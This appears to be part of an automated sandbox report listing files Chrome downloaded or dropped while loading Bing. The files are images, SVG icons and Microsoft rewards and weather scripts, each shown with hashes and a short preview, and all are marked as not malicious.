                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....ph_zV.P].--GN.w.c.%..|..rEjh:d.Ff..^zU]v....A..\..^.i....;u...~.....e.T.FC.lV..F..nk..F...b;.Ab..^..]K..,...z.2.i,l..I....+..V...'r.....!.X....f.m..c.8*.....i1...p3..|....27\.Q.?T..K.cngA......6.kT.O.i.-............."..S..F.".....Eg.).(..f......S4..'.tz..2c.k..5;Y.h.@[.hEE.NM.+.b......t?.u. .8..4.>..sz.1.X.........1.Q..w...4+.5...N.l.+..O.......
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):282
                                                                                                                                                                                                                                                                        Entropy (8bit):4.768675821769942
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:tbXH4mc4sl3UY7eERI1+N9H5R0MLERIwoVNdJMvdIXyCWfuBIAFfu:tbH41niB1+bj0MLBnpavdqyVGBIAFm
                                                                                                                                                                                                                                                                        MD5:E38795B634154EC1FF41C6BCDA54EE52
                                                                                                                                                                                                                                                                        SHA1:16C6BF388D00A650A75685C671AF002CEA344B4B
                                                                                                                                                                                                                                                                        SHA-256:66B589F920473F0FD69C45C8E3C93A95BB456B219CBA3D52873F2A3A1880F3F0
                                                                                                                                                                                                                                                                        SHA-512:DCA2E67C46CFF1B9BE39CE8B0D83C34173E6B77EC08FA4EB4BA18A4555144523C570D785549FED7A9909C2E2C3B48D705B6E332832CA4D5DE424B5F7C3CD59BE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">.. <path d="M0 0h16v16h-16z" fill="none"/>.. <path d="M8 1a7 7 0 1 0 7 7 7 7 0 0 0-7-7zm1 10a1 1 0 0 1-2 0v-3a1 1 0 0 1 2 0zm-.293-5.293a1 1 0 1 1 .293-.707 1 1 0 0 1-.293.707z" fill="#767676"/>..</svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):257
                                                                                                                                                                                                                                                                        Entropy (8bit):4.781091704776374
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:qMH4WXMHwmnIB4JmhyfAIB4Jmml0X2IUJIB4JrNOsK1A4JWW7jKYHVA4JRGYdA4S:q6XzD4jr43ldI74FNQlNj7jM9TlMlbSr
                                                                                                                                                                                                                                                                        MD5:51A9EA95D5ED461ED98AC3D23A66AA15
                                                                                                                                                                                                                                                                        SHA1:62FBB857B873BD79BEE7F16D0766A452FA2798A3
                                                                                                                                                                                                                                                                        SHA-256:A5B4181611E951FAECD6C164D704569C633E95FE68D3D1934B911A089EBF70E8
                                                                                                                                                                                                                                                                        SHA-512:CEE4231894F82627E50EC746D7C150E5303A1BF8864D7B084173B9D17663A27CC2915F5D0D4DC0602FE26D9EAA10DD98CF3422E7601F520EF34D45C9A506D6F7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/Yvu4V7hzvXm-5_FtB2akUvonmKM.js
                                                                                                                                                                                                                                                                        Preview:var BM=BM||{};BM.rules={"#sc_hdu":[-1,-1,1],"#hp_id_hdr":[-1,-1,1],"#hp_container":[-1,-1,1],".hp_sw_logo":[-1,-1,0],".b_searchboxForm":[-1,-1,0],"#crs_pane":[-1,-1,0],"#sb_foot":[-1,-1,0],"#sh_rdiv":[-1,-1,0],"img,div[data-src]":[-1,-1,0],iframe:[-1,-1,0]}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):49414
                                                                                                                                                                                                                                                                        Entropy (8bit):7.786337557112325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:eXE/6WOXA8PSYII3AhacUdETPWFr6I/DzSdIwToogvGN:gXWwA86YT3CacUdE6Fr6I/yqwTBgvGN
                                                                                                                                                                                                                                                                        MD5:34EE08F8009454029F63D7A7B29B8734
                                                                                                                                                                                                                                                                        SHA1:4FF9B969FD247385B7B537E27AB755ABF10B619B
                                                                                                                                                                                                                                                                        SHA-256:0B5DB1273969107A2927391E904E7E70B1B15D40568CE11717A8B6899BB7B623
                                                                                                                                                                                                                                                                        SHA-512:2B728A0F02F1D41F29BCC5E4CBF29E138F199450A1AFCBC7B6B2790E2A8BCE6AB71B19DB7668A40D0F6B702DD1931B90FC60EE1ECB776DA2DDBF8053C068D68F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:GIF89a2.2..?.......................................................................................................................................................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:c996674d-1dbc-4dcb-94bf-c133a5e098f7" xmpMM:DocumentID="xmp.did:D4316C07BD1811EC9355E848C6087788" xmpMM:InstanceID="xmp.iid:D4316C06BD1811EC9355E848C6087788" xmp:CreatorTool="Adobe Photoshop 23.3 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c996674d-1dbc-4dcb-94bf-c133a5e098f7" stRef:documentID="xmp.di
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3075
                                                                                                                                                                                                                                                                        Entropy (8bit):7.832568245757873
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEZAQjfEwZBDooToPFWkhmqr+n8zgx85:yge1jf1ZBDoA8Fxj/zR5
                                                                                                                                                                                                                                                                        MD5:76A880B2D1C747BC02CC7B1C640571EF
                                                                                                                                                                                                                                                                        SHA1:09F21D08BCBC1BD2EF684FFED5FB87DB2E2548AB
                                                                                                                                                                                                                                                                        SHA-256:D4A7E3B8DAB8AAF80AF890AEEEE8097ADC059F8E9C241AADD9419F92CF911509
                                                                                                                                                                                                                                                                        SHA-512:2ADE1C15843261ADD97E5594357F2301C831C054E7074650C92A809C666F5415B46E185D8C38C87376D39F137026307D418C2FEE2E10D5E01A3A8D2DD098E72E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(....\......N.|.4.#.G.....q.......x8cB.z^.?...~......<...zj....A....:..?..o.........N...kP\.W..k/..k..7.....Z.f.".H.~.AW..Uu.{}.L..Fd.M..=*[h..)# ../CX..]..3..BI.'..5..=.Sm....v..,..,..,.O.S.]j.qi%;..95.wG|i...h."\.....x.1..mF..32.=+2..?....T.h...zE..pK...>.S.kU.rW*...&.8..a.m.K......o.h..uG...?.F..9.q.Y.....U...hs.kq.........:6.q...}.y.>..'..K.f..:7Z..]J
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):30124
                                                                                                                                                                                                                                                                        Entropy (8bit):7.963662505905781
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:eM4Bin1ArpKclB0CZRzWn2ui9/xjVJv+TzTrh:eM4qAVKQi+RzicVxj+TN
                                                                                                                                                                                                                                                                        MD5:9ACA1DA3F7335D891B44E4AA6540D0C6
                                                                                                                                                                                                                                                                        SHA1:F503708EFEC5FAB3F97986268B1DC5A84107320B
                                                                                                                                                                                                                                                                        SHA-256:BF05A9E8318C04E898DEA10EE8ACF896B87609ED3472DF78BB18F15159CB2DD9
                                                                                                                                                                                                                                                                        SHA-512:CA2E72716998D7B8279A56F4A340628D9612D7B4389DCE6CA47711DC7402DC5D4A4057A7B5ACD3BF617BEB268B2065F700BBA0B023DC21CF3F38EAB78FCFC473
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.a00304019aedd964113a722b733f3470&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...v#......i.&.....<.~.eop...Y..<1L..#gBB.1.T..3Z..I..../.hR^..#k..i....l.v..FXc*.s.....Iu<.cS...m'.V.........|'.../=...!c.$..y....Uh..7.^..sH.U.gm{..z>.kx.%...,S.r....R:.pj."..A.jv9W...w..<7.X.......6...'.x.n..?enr..y.x?{...C.iz&...j.......m%.....Gv......"..r..#..T......be.)r....:yn"..\..[e.H.Vi..;VP.g.$...$..5...:v.=..Vo...u.>...W..5...L..R..Y.zRe.*..u..L.A[
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4853
                                                                                                                                                                                                                                                                        Entropy (8bit):7.903813188761342
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgExdO60rog98D6uIrdpnrrXpF105mVeORAXPHd:yga46Fg9g6pdxnv105mIOR6
                                                                                                                                                                                                                                                                        MD5:AC1A329E11731E1AEDCE40B69AE5943A
                                                                                                                                                                                                                                                                        SHA1:FDB06BF2A6427019F0BCAA2B0FC69FDA572452C7
                                                                                                                                                                                                                                                                        SHA-256:AE5EBB4CD136D7655E5522BF407ED29F80BB75A2592F7FB7722F118A15187C58
                                                                                                                                                                                                                                                                        SHA-512:C69510AD131CEF1D1765B3C66650A7A5D97578671286003D19DA1CFA79FFE7FC5C150B7AD72EA6ABF7C96EFA4F1D7E440FEA71F7FB08BDAAE71535477C99E2C8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..o..M:....W.bCE.....L.=........<+.1^k........'...T.u'...2p95..;..g.k.4..8u.M...11[6z.>... ...W~*x...x4.a)....1J..@..8..l...sM.]..f/.L2G~.j.x...&..SW.k...N6....=....Vd.#.5.5.x.NP.rOOl.WW..F[...n\.'$..t.....'.....`.I....:............Q@b.5...o.?..k;.[.aqcs..,H.D.L.......o,Ld.BDY. ..Z..1.;.|J.s..Z..@F..Q....s..#+..)....?h!..v.......E.^...~.#?.....Ah..\....`\..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):964
                                                                                                                                                                                                                                                                        Entropy (8bit):4.421237058266115
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t741nTY2jmYXhgauOwgXl3gHuWg9cZLzix9QiVCVCTikxQmQ6Nkpgeoo7:dQnkwXhnuOwIlwHuW7nC9QkaUzQm3Nk5
                                                                                                                                                                                                                                                                        MD5:88E3ED3DD7EEE133F73FFB9D36B04B6F
                                                                                                                                                                                                                                                                        SHA1:518B54603727D68665146F987C13F3E7DCDE8D82
                                                                                                                                                                                                                                                                        SHA-256:A39AB0A67C08D907EDDB18741460399232202C26648D676A22AD06E9C1D874CB
                                                                                                                                                                                                                                                                        SHA-512:90FF1284A7FEB9555DFC869644BD5DF8A022AE7873547292D8F6A31BA0808613B6A7F23CB416572ADB298EEE0998E0270B78F41C619D84AB379D0CA9D1D9DA6B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16"><g fill="#00809D"><path d="M2.25 0h-1.25c-.263 0-.521.107-.707.293-.186.186-.293.444-.293.707v1.25c0 .552.448 1 1 1s1-.448 1-1v-.25h.25c.552 0 1-.448 1-1s-.448-1-1-1zM1 8.75c.552 0 1-.448 1-1v-1.5c0-.552-.448-1-1-1s-1 .448-1 1v1.5c0 .552.448 1 1 1zM2.25 12h-.25v-.25c0-.552-.448-1-1-1s-1 .448-1 1v1.25c0 .263.107.521.293.707s.444.293.707.293h1.25c.552 0 1-.448 1-1s-.448-1-1-1zM11.75 2h.25v.25c0 .552.448 1 1 1s1-.448 1-1v-1.25c0-.263-.107-.521-.293-.707-.186-.186-.444-.293-.707-.293h-1.25c-.552 0-1 .448-1 1s.448 1 1 1zM6.25 2h1.5c.552 0 1-.448 1-1s-.448-1-1-1h-1.5c-.552 0-1 .448-1 1s.448 1 1 1zM14.5 7h-.5v-.75c0-.552-.448-1-1-1s-1 .448-1 1v.75h-3.5c-.828 0-1.5.671-1.5 1.5v3.5h-.75c-.552 0-1 .448-1 1s.448 1 1 1h.75v.5c0 .828.672 1.5 1.5 1.5h6c.828 0 1.5-.672 1.5-1.5v-6c0-.829-.672-1.5-1.5-1.5z"/></g><path fill="none" d="M0 0h16v16h-16z"/></svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (28499), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):28499
                                                                                                                                                                                                                                                                        Entropy (8bit):5.464092044647653
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:kpe5mB7azmB7ad5KVyDQNSkGyDQS2mZvghM/4S8Sv:kVaAazDxgDj/Zvb7nv
                                                                                                                                                                                                                                                                        MD5:435D4389CF37EBDF488B09D33328E64C
                                                                                                                                                                                                                                                                        SHA1:E4897917BB729F94808672478A32FAD44CEEB350
                                                                                                                                                                                                                                                                        SHA-256:F56C5B27AD30B13345DEDB5081AC381A0BE37A454242D2D289B90C5F44CDDDA8
                                                                                                                                                                                                                                                                        SHA-512:E0C35C5055200CD536B190966872EBEB8D7ED9ECE087E49F51B0EF6F9D7A935DC938C53C9C562E42506A10DDDE08C6B8D7B0A1EFB10BCD972FE5EF124DCCA88A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redotIMG.png",w=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible}}return n.prototype.initialize=function(){var r=this,e,o,s,w,n;if(this.reportActivityModel){if(this.sendR
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3075
                                                                                                                                                                                                                                                                        Entropy (8bit):7.832568245757873
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEZAQjfEwZBDooToPFWkhmqr+n8zgx85:yge1jf1ZBDoA8Fxj/zR5
                                                                                                                                                                                                                                                                        MD5:76A880B2D1C747BC02CC7B1C640571EF
                                                                                                                                                                                                                                                                        SHA1:09F21D08BCBC1BD2EF684FFED5FB87DB2E2548AB
                                                                                                                                                                                                                                                                        SHA-256:D4A7E3B8DAB8AAF80AF890AEEEE8097ADC059F8E9C241AADD9419F92CF911509
                                                                                                                                                                                                                                                                        SHA-512:2ADE1C15843261ADD97E5594357F2301C831C054E7074650C92A809C666F5415B46E185D8C38C87376D39F137026307D418C2FEE2E10D5E01A3A8D2DD098E72E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_hL89PD2lwyOp2o_KeDG4KQ&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(....\......N.|.4.#.G.....q.......x8cB.z^.?...~......<...zj....A....:..?..o.........N...kP\.W..k/..k..7.....Z.f.".H.~.AW..Uu.{}.L..Fd.M..=*[h..)# ../CX..]..3..BI.'..5..=.Sm....v..,..,..,.O.S.]j.qi%;..95.wG|i...h."\.....x.1..mF..32.=+2..?....T.h...zE..pK...>.S.kU.rW*...&.8..a.m.K......o.h..uG...?.F..9.q.Y.....U...hs.kq.........:6.q...}.y.>..'..K.f..:7Z..]J
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):158668
                                                                                                                                                                                                                                                                        Entropy (8bit):5.420662290061511
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:atBzrSYiNjp3psRvfx3lfeAYSh4W9/UN0nw+GfElKNJvSQ4LohD6V:a3iaRX9lf9D9cMw1fElKsLoY
                                                                                                                                                                                                                                                                        MD5:3E40D54D8F8CB4643458072E37081665
                                                                                                                                                                                                                                                                        SHA1:81845E3F3850D0F35CD251BB29520AFF5DCAF4CF
                                                                                                                                                                                                                                                                        SHA-256:973A6733C17C53C46C428BF36B68B4DDB6C8CC8C941E91E1FCB57645F596FE13
                                                                                                                                                                                                                                                                        SHA-512:B91E6A60FD054C3F1113F3E7A3E717B801F8D3DDAAEA1B03D630CA9D9CEBCECDFD788E412240F10D2D7DB8B798F0B6C317BD9D1C2A28943C2C876FFEB9DDC2C6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/weather-card.43288de41fd9a118d1c6.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["weather-card"],{62602:function(e,t){"use strict";t.Z='<svg width="15" height="13" viewBox="0 0 15 13" class="inline-DS-card1-4 contextMenuItem_image-DS-card1-1 contextMenuItem_image-DS-card1-2"><path d="M2.5 5c-.6 0-1.1-.22-1.52-.64A2.12 2.12 0 0 1 .34 2.8c0-.6.21-1.1.63-1.51.42-.42.92-.63 1.52-.63s1.12.21 1.54.63c.43.41.64.92.64 1.51 0 .6-.2 1.12-.63 1.55-.42.42-.93.63-1.53.63Zm0-3.41c-.33 0-.62.12-.86.36-.24.23-.36.52-.36.86 0 .35.12.65.35.9.24.25.52.37.86.37.34 0 .63-.13.88-.38.24-.25.36-.54.36-.89 0-.34-.12-.63-.35-.86a1.18 1.18 0 0 0-.87-.36Zm12.13 9.94c-.83.44-1.86.66-3.1.66-1.6 0-2.87-.52-3.83-1.54A5.68 5.68 0 0 1 6.27 6.6c0-1.8.53-3.24 1.61-4.34A5.49 5.49 0 0 1 11.98.6c1.07 0 1.95.15 2.64.46v1.4a5.35 5.35 0 0 0-2.65-.67c-1.29 0-2.33.43-3.13 1.29-.8.86-1.2 2-1.2 3.44 0 1.37.37 2.45 1.12 3.27.75.8 1.73 1.2 2.94 1.2 1.13 0 2.1-.24 2.93-.74v1.27Z"/></svg>'},59234:function(e,t){"use
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:53:43], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4934
                                                                                                                                                                                                                                                                        Entropy (8bit):7.782095567670307
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sHbZoNWsmjRgjXFQvdXNkuz4nicDWk+4Nf6Q2mKwADHfXC7OWn:sFmmjGjWddkuz4nicyktAtmtAbuLn
                                                                                                                                                                                                                                                                        MD5:FDA2CEAE0679611937E6E71F701A36AB
                                                                                                                                                                                                                                                                        SHA1:75B98D4B8E7142F0F57620296354F61C4C6F3A8F
                                                                                                                                                                                                                                                                        SHA-256:B818C1E9B0B46CCCDC158ACA581C3C5F4A9BD3DDA380DA03AF52F43F14F5651E
                                                                                                                                                                                                                                                                        SHA-512:904100EBE310AFDF86C2E4C9CBDDC118178D41B45D076BB6077DB8F3BCED8B3CEDF545CE079E39B6F8034C2247FD4C824C0522B6221E3CDC02423AF8EEB9F8A3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:53:43....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................._..Z/9.....AhY...T0*!Eu,..dk.....y. .LP.B..V..m@@f....<uf.......h...)8.2j..*U...<.n....4.B.-....W..^.J..o.{.....z.....".s.,.S...;...^f<.O8,>u.s...n.)....\o..6.{.=#:(.F.;..;1].V.........U5.1..W..g7|r5..==...Hy..h....@...KV.{.l.9.........F.S....N{9.Y..(C.f..u\..&OX..-..N..w\..(.:.1..:ldGW.q.!...mo...e.=........a2..:hkA.....Z.:r}.....Z[...../\...-..A.#..E-K.5..k........]....yQhiAF........cy.[...C..qg.j.Y..Q3.Uh(..X.>kjs..5.....=.M.J.m.Q...FE.m=s..>.WSv..J..42+....V..[....n,.h..5...\.I]...%T.0k.=...h..5.td....].@.\..^.r....d.f..[....k....0*E.U..H.....G...]]Z.M.Y..-..I....%.......................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2524), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2524
                                                                                                                                                                                                                                                                        Entropy (8bit):5.496443534651084
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:PvB3ugs9kys5b+qM4qKr+KOHaH4ZMLSyKQug1LL7j:PvB89kyPWqKKKOHY4Z+zn
                                                                                                                                                                                                                                                                        MD5:17CDAB99027114DBCBD9D573C5B7A8A9
                                                                                                                                                                                                                                                                        SHA1:42D65CAAE34EBA7A051342B24972665E61FA6AE2
                                                                                                                                                                                                                                                                        SHA-256:5FF6B0F0620AA14559D5D869DBEB96FEBC4014051FA7D5DF20223B10B35312DE
                                                                                                                                                                                                                                                                        SHA-512:1FE83B7EC455840A8DDB4EEDBBCD017F4B6183772A9643D40117A96D5FFF70E8083E424D64DEBA209E0EF2E54368ACD58E16E47A6810D6595E1D89D90BCA149A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var RewardsHeaderSVG;(function(n){function w(){s()}function b(n,t){var i=sj_cook.get(h,l);t?n.indexOf(i)>-1?o():s():k()>0&&o()}function o(){g();sb_st(nt,u);sb_st(d,u)}function k(){var n=sj_cook.get(c,a);return parseInt(n)}function d(){sj_evt.fire(v)}function s(){sj_evt.fire(y)}function g(){var u=_ge(r),n;_ge(t)&&Lib.CssClass.add(_ge(t),"rd_hide");_ge(i)&&Lib.CssClass.add(_ge(i),"rd_hide");u&&(n=document.createElement("img"),n.setAttribute("id","coinFlipGif"),n.setAttribute("class","rhcoinflip"),n.setAttribute("src",p),u.appendChild(n),u.style.display="block")}function nt(){_ge(r).style.display="none";_ge(t)&&Lib.CssClass.remove(_ge(t),"rd_hide");_ge(i)&&Lib.CssClass.remove(_ge(i),"rd_hide")}var h="_RwBf",c="_SS",l="v",a="RP",r="coinFlipGifContainer",t="rewards_header_icon serp",i="rewards_header_icon hp",v="rewardsRedDot",y="redDotAnimation",u=1750,p="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/coin_flip_3d.gif",f=_d.querySelector(".rhlined.serp, .rhlined.hp"),e=_d.que
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                                                        Entropy (8bit):4.510163916949154
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPahm1lWrg91nyJV1JGOZBouB1eNAWmXcKQ1W1:6v/74+dyJV2O/TDSYsKQ8
                                                                                                                                                                                                                                                                        MD5:2CB038DB4D785FBF1014B83723250865
                                                                                                                                                                                                                                                                        SHA1:9F146FB8557766B4ECD653CB0FF96DF85FFC0BE0
